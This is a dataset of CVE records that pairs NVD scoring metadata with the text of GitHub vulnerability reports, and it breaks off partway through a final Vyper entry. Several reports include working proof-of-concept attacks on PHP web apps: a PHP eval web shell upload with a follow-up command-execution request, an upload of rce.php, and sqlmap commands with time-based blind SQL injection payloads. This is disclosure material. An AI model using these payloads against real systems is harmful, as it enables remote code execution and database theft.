# Location of vulnerabilities in source code
<img width="974" alt="3" src="https://github.com/wkeyi0x1/vul-report/assets/52342243/84570622-6166-4850-9683-88d09d2299d9"> | Complete E-Commerce Site in PHP/MySQLi - Arbitrary file vulnerability uploading leads to command execution | https://api.github.com/repos/wkeyi0x1/vul-report/issues/4/comments | 0 | 2024-03-20T19:15:42Z | 2024-03-20T19:15:42Z | https://github.com/wkeyi0x1/vul-report/issues/4 | 2,198,365,705 | 4 | 6,012 |
CVE-2024-2849 | 2024-03-23T18:15:07.770 | A vulnerability classified as critical was found in SourceCodester Simple File Manager 1.0. This vulnerability affects unknown code. The manipulation of the argument photo leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257770 is the identifier assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CveSecLook/cve/issues/1"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.257770"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.257770"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.303123"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CveSecLook/cve/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.257770"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.257770"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.303123"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ganeshrkt:simple_file_manager_web_app:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "3077F229-94E7-49B4-9E8E-A44CB9702353",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/CveSecLook/cve/issues/1 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"CveSecLook",
"cve"
] | # Simple File Manager Web App using PHP and MySQL Database Free Source Code - Arbitrary file vulnerability uploading leads to command execution
+ Author: FanYZ
# Vendor Homepage
+ https://www.sourcecodester.com/upload-download-and-delete-file-using-php-mysql.html
# Software Link
+ https://www.sourcecodester.com/sites/default/files/download/oretnom23/myfilemgr.zip
# Overview
+ FanYZ has discovered a vulnerability classified as critical in Simple File Manager Web App using PHP and MySQL Database Free Source Code. The function upload is affected. This operation will result in unrestricted uploads. Remote attacks can cause RCE.
# Vulnerability Details
+ Simple File Manager Web App using PHP and MySQL Database Free Source Code V1.0
+ Vulnerable File: index.php
+ Parameter Names: filename
+ Attack Type: Remote
# Description
+ FanYZ has discovered a vulnerability classified as critical in Simple File Manager Web App using PHP and MySQL Database Free Source Code. This issue affects the function upload. The manipulation with an unknown input leads to a unrestricted upload vulnerability.
# Note
+ No need to log in to the website, no interaction required to RCE!
# Proof of Concept (PoC) :
0x01
```
POST / HTTP/1.1
Host: www.myfilemgr.com:8092
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------35394075757009027883742263970
Content-Length: 367
Upgrade-Insecure-Requests: 1
-----------------------------35394075757009027883742263970
Content-Disposition: form-data; name="photo"; filename="shell.php"
Content-Type: text/plain
<?php @eval($_POST['cmd']); ?>
-----------------------------35394075757009027883742263970
Content-Disposition: form-data; name="submit"
SUBMIT
-----------------------------35394075757009027883742263970--
```
<img width="1193" alt="2" src="https://github.com/CveSecLook/cve/assets/42730714/f3102a1b-7376-48b8-9fbc-0232cbbf2a02">
0x02
```
POST /files/shell.php HTTP/1.1
Host: www.myfilemgr.com:8092
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 14
Connection: close
cmd=phpinfo();
```
<img width="1190" alt="1" src="https://github.com/CveSecLook/cve/assets/42730714/5c404942-8235-44b1-ab00-93c0223f47d7">
| Simple File Manager Web App using PHP and MySQL Database Free Source Code - Arbitrary file vulnerability uploading leads to command execution | https://api.github.com/repos/CveSecLook/cve/issues/1/comments | 0 | 2024-03-22T14:51:45Z | 2024-03-22T14:51:45Z | https://github.com/CveSecLook/cve/issues/1 | 2,202,684,616 | 1 | 6,013 |
CVE-2024-2932 | 2024-03-27T01:15:46.830 | A vulnerability classified as critical has been found in SourceCodester Online Chatting System 1.0. Affected is an unknown function of the file admin/update_room.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-258012. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CveSecLook/cve/issues/3"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.258012"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.258012"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.304257"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CveSecLook/cve/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.258012"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.258012"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.304257"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:donbermoy:online_chatting_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "85923067-902A-42B7-BB5E-4C6ACE3990C0",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/CveSecLook/cve/issues/3 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"CveSecLook",
"cve"
] | # Online Chatting System using PHP/MySQL update_room.php - SQL injection vulnerability
+ Author: WangPeng CUMT
# Vendor Homepage
+ https://www.sourcecodester.com/php/14224/online-chatting-system-using-phpmysql.html
# Software Link
+ https://www.sourcecodester.com/download-code?nid=14224&title=Online+Chatting+System+using+PHP%2FMySQL
# Overview
+ WangPeng CUMT has discovered that Online Chatting System using PHP/MySQL is affected by serious security vulnerabilities due to insufficient protection of the "id" parameter in the "admin/update_room. php" file. This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database.
# Vulnerability Details
+ Online Chatting System using PHP/MySQL V1.0
+ Vulnerable File: admin/update_room.php
+ Parameter Names: id
+ Attack Type: Remote
# Description
+ WangPeng CUMT has discovered that Online Chatting System using PHP/MySQL is affected by serious security vulnerabilities due to insufficient protection of the "id" parameter in the "admin/update_room.php" file. This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database.
# Proof of Concept (PoC) :
+ `sqlmap -u 'http://www.onlinechatting.com:8089/admin/update_room.php' -p 'id' --data="id=1"--method='POST'`
```
---
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: edit=1&id=1' AND (SELECT 9968 FROM (SELECT(SLEEP(5)))Xnth) AND 'Oiis'='Oiis&name=1&pass=1
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
```
<img width="1638" alt="image-1" src="https://github.com/CveSecLook/cve/assets/52342243/e7860867-244a-4975-8a4e-ef41a5d945af">
# POC
```
POST /admin/update_room.php HTTP/1.1
Host: www.onlinechatting.com:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
edit=1&id=1' AND (SELECT 9968 FROM (SELECT(SLEEP(10)))Xnth) AND 'Oiis'='Oiis&name=1&pass=1
```
<img width="1501" alt="image" src="https://github.com/CveSecLook/cve/assets/52342243/35528787-c6c1-4345-bcf8-175b7a72e13e"> | Online Chatting System using PHP/MySQL update_room.php - SQL injection vulnerability | https://api.github.com/repos/CveSecLook/cve/issues/3/comments | 0 | 2024-03-25T20:14:01Z | 2024-03-25T20:14:01Z | https://github.com/CveSecLook/cve/issues/3 | 2,206,616,626 | 3 | 6,014 |
CVE-2024-31506 | 2024-04-09T18:15:10.467 | Sourcecodester Online Graduate Tracer System v1.0 is vulnerable to SQL Injection via the "id" parameter in admin/admin_cs.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CveSecLook/cve/issues/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CveSecLook/cve/issues/4"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:tamparongj03:online_graduate_tracer_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "48BB2CA2-9E7E-4C08-B25E-7377696BF3B5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/CveSecLook/cve/issues/4 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"CveSecLook",
"cve"
] | # Online Graduate Tracer System for College of ICT Alumni in PHP Free Source Code V1.0 admin/admin_cs.php - SQL injection vulnerability V1.0 admin/admin_cs.php - SQL injection vulnerability
+ Author: zhang guixiang
# Vendor Homepage
+ https://www.sourcecodester.com/php/15904/online-graduate-tracer-system-college-ict-alumni.html
# Software Link
+ https://www.sourcecodester.com/sites/default/files/download/oretnom23/tracking.zip
# Overview
+ zhang guixiang has discovered that Online Graduate Tracer System for College of ICT Alumni in PHP Free Source Code is affected by serious security vulnerabilities due to insufficient protection of the "id" parameter in the "admin/admin_cs.php" file. This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database.
# Vulnerability Details
+ Online Graduate Tracer System for College of ICT Alumni in PHP Free Source Code V1.0 admin/admin_cs.php - SQL injection vulnerability V1.0
+ Vulnerable File: admin/admin_cs.php
+ Parameter Names: id
+ Attack Type: Remote
# Description
+ zhang guixiang has discovered that Online Graduate Tracer System for College of ICT Alumni in PHP Free Source Code is affected by serious security vulnerabilities due to insufficient protection of the "id" parameter in the "admin/admin_cs.php" file. This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database.
# Proof of Concept (PoC) :
+ `sqlmap -u "www.tracking.com:8098/admin/admin_cs.php?id=1" -p id --dbms=mysql -v 3`
```
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 2975 FROM (SELECT(SLEEP(5)))ansi) AND 'Pxda'='Pxda
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
```
<img width="1639" alt="1" src="https://github.com/CveSecLook/cve/assets/52342243/baa23a06-d8c5-4ea0-9391-db06593538f4">
# Burp Suite (POC):
```
GET /admin/admin_cs.php?id=id=1' AND (SELECT 2975 FROM (SELECT(SLEEP(10)))ansi) AND 'Pxda'='Pxda HTTP/1.1
Host: www.tracking.com:8098
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```
<img width="1500" alt="2" src="https://github.com/CveSecLook/cve/assets/52342243/2417a0f2-92c8-4113-969b-669e06cb1f0b"> | Online Graduate Tracer System for College of ICT Alumni in PHP Free Source Code V1.0 admin/admin_cs.php - SQL injection vulnerability V1.0 admin/admin_cs.php - SQL injection vulnerability | https://api.github.com/repos/CveSecLook/cve/issues/4/comments | 0 | 2024-03-27T16:28:13Z | 2024-03-28T16:31:03Z | https://github.com/CveSecLook/cve/issues/4 | 2,211,250,054 | 4 | 6,015 |
CVE-2024-30916 | 2024-04-11T06:15:07.030 | An issue was discovered in eProsima FastDDS v.2.14.0 and before, allows a local attacker to cause a denial of service (DoS) and obtain sensitive information via a crafted max_samples parameter in DurabilityService QoS component. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.5,
"impactScore": 1.4,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/eProsima/Fast-DDS/issues/4609"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/eProsima/Fast-DDS/issues/4609"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eprosima:fast_dds:*:*:*:*:*:*:*:*",
"matchCriteriaId": "73596FAC-A0D1-4AC6-BB80-C9459B1EA433",
"versionEndExcluding": null,
"versionEndIncluding": "2.14.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"20"
] | 20 | https://github.com/eProsima/Fast-DDS/issues/4609 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"eProsima",
"Fast-DDS"
] | ### Is there an already existing issue for this?
- [X] I have searched the existing issues
### Expected behavior
When setting history_depth = 0 or max_samples = 0 in DurabilityService QoS, return bad parameter or inform inconsistent QoS.
### Current behavior
Despite inconsistent QoS settings, datareader, datawriter and topic are created normally.
### Steps to reproduce
It is inconsistent if `max_samples < (max_instances * max_samples_per_instance)` . But when setting max_instances=0 or history_depth=0, Despite inconsistent QoS settings, datareader, datawriter and topic are created normally.
Insert the following code in HelloWorldSubscriber.cpp in HelloWorldExample.
```cpp
// Creating DataReader QoS like this caused error.
DataReaderQos rqos = DATAREADER_QOS_DEFAULT;
rqos.durability_service().history_depth = 0;
rqos.durability_service().max_samples = 0;
DataWriterQos rqos = DATAWRITER_QOS_DEFAULT;
rqos.durability_service().history_depth = 0;
rqos.durability_service().max_samples = 0;
TopicQoS tqos = TOPIC_QOS_DEFAULT;
tqos.durability_service().history_depth = 0;
tqos.durability_service().max_samples = 0;
```
### Fast DDS version/commit
`Fast-DDS v2.11.2`, but I think it's going to happen in the latest version, too
### Platform/Architecture
Ubuntu Focal 20.04 amd64
### Transport layer
Default configuration, UDPv4 & SHM, Intra-process
### Additional context
This issue is similar with #4574.
This is an issue in eProsima FastDDS v.2.14.0 and before allows a local attacker to obtain sensitive information via the history_depth component.
### XML configuration file
_No response_
### Relevant log output
_No response_
### Network traffic capture
_No response_ | Allow inconsistent about DurabilityService QoS | https://api.github.com/repos/eProsima/Fast-DDS/issues/4609/comments | 1 | 2024-03-22T20:41:06Z | 2024-04-05T20:09:51Z | https://github.com/eProsima/Fast-DDS/issues/4609 | 2,203,278,979 | 4,609 | 6,016 |
CVE-2024-3948 | 2024-04-18T11:15:39.300 | A vulnerability was found in SourceCodester Home Clean Service System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file \admin\student.add.php of the component Photo Handler. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-261440. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/xuanluansec/vul/issues/5"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.261440"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.261440"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.318722"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/xuanluansec/vul/issues/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.261440"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.261440"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.318722"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:library_system_project:library_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "AD9DDE89-9456-4FAB-B277-1F80D6D9EDBC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/xuanluansec/vul/issues/5 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"xuanluansec",
"vul"
] | # SourceCodester Home Clean Service System in PHP Free Source Code 1.0 student_add.php Unrestricted Upload
# NAME OF AFFECTED PRODUCT(S)
+ Library System using PHP/MySQli with Source Code
## Vendor Homepage
+ https://www.sourcecodester.com/php/12275/library-system-using-php.html
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ fengxiangdi
## Vulnerable File
+ student_add.php
## VERSION(S)
+ V1.0
## Software Link
+ https://www.sourcecodester.com/sites/default/files/download/oretnom23/libsystem.zip
# PROBLEM TYPE
## Vulnerability Type
+ File upload
## Root Cause
+ The input obtained from line 8 of the \admin\student.add.php file is used to determine the location of the file to be written, which may allow attackers to modify or damage the content of the file, or create a brand new file.
+ 
## Impact
+ Attackers can exploit this vulnerability for unrestricted uploads, and remote attacks may result in RCE.
# DESCRIPTION
+ Fengxiangdi found that the file upload operation was triggered in student.add.php, and the _FAILE variable was used to receive the payload. After receiving the attack vector from a remote attacker, it will result in unrestricted uploads, and remote attacks may lead to RCE.
# Vulnerability details and POC
## Payload
+ The picture I uploaded here is a photo of carrying a Trojan horse, but due to character confusion, I took a screenshot directly.
+ 
```
POST /admin/student_add.php HTTP/1.1
Host: localhost
Content-Length: 2498
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.libsystem.com:8103
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryofX7Z9Ez1nJnPqJ5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://www.libsystem.com:8103/admin/student.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundaryofX7Z9Ez1nJnPqJ5
Content-Disposition: form-data; name="firstname"
www
------WebKitFormBoundaryofX7Z9Ez1nJnPqJ5
Content-Disposition: form-data; name="lastname"
www
------WebKitFormBoundaryofX7Z9Ez1nJnPqJ5
Content-Disposition: form-data; name="course"
2
------WebKitFormBoundaryofX7Z9Ez1nJnPqJ5
Content-Disposition: form-data; name="photo"; filename="rce.php"
Content-Type: image/jpeg
Node:Sorry, due to some coding reasons, I am unable to use markdown to store image data with attack payloads here.
------WebKitFormBoundaryofX7Z9Ez1nJnPqJ5
Content-Disposition: form-data; name="add"
------WebKitFormBoundaryofX7Z9Ez1nJnPqJ5--
```
+ I successfully connected using shell tools
+ 
+ I successfully executed the ipconfig command using shell tools
+ 
| SourceCodester Home Clean Service System in PHP Free Source Code 1.0 student_add.php Unrestricted Upload | https://api.github.com/repos/xuanluansec/vul/issues/5/comments | 0 | 2024-04-17T17:10:01Z | 2024-04-17T17:10:01Z | https://github.com/xuanluansec/vul/issues/5 | 2,248,786,611 | 5 | 6,017 |
CVE-2024-32648 | 2024-04-25T18:15:09.157 | Vyper is a pythonic Smart Contract Language for the Ethereum virtual machine. Prior to version 0.3.0, default functions don't respect nonreentrancy keys and the lock isn't emitted. No vulnerable production contracts were found. Additionally, using a lock on a `default` function is a very sparsely used pattern. As such, the impact is low. Version 0.3.0 contains a patch for the issue.
| {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
